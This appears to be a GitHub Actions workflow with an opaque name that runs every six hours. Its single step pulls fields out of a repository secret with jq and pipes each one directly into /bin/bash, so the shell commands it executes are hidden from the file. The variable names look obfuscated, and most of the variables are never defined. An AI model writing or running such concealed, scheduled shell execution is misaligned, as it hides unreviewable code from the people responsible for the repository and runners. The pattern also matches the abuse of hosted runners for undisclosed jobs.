name: quanxuanxiangshou

on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: quanxuanxiangshou
        env:
          dd5385: ${{ secrets.dd5385 }}
        run: |
          echo $dd5385 | jq -r .wm36 | /bin/bash
          echo $e012 | jq -r .rncpb4959 | /bin/bash
          echo $czkg5 | jq -r .nvk95 | /bin/bash
          echo $qcn120 | jq -r .jt1 | /bin/bash
          echo $dv79230 | jq -r .ie190 | /bin/bash
          echo $y2718 | jq -r .lpqc724 | /bin/bash
          echo $wfzvz688 | jq -r .te0097 | /bin/bash
          echo $bu396 | jq -r .dvhc7 | /bin/bash

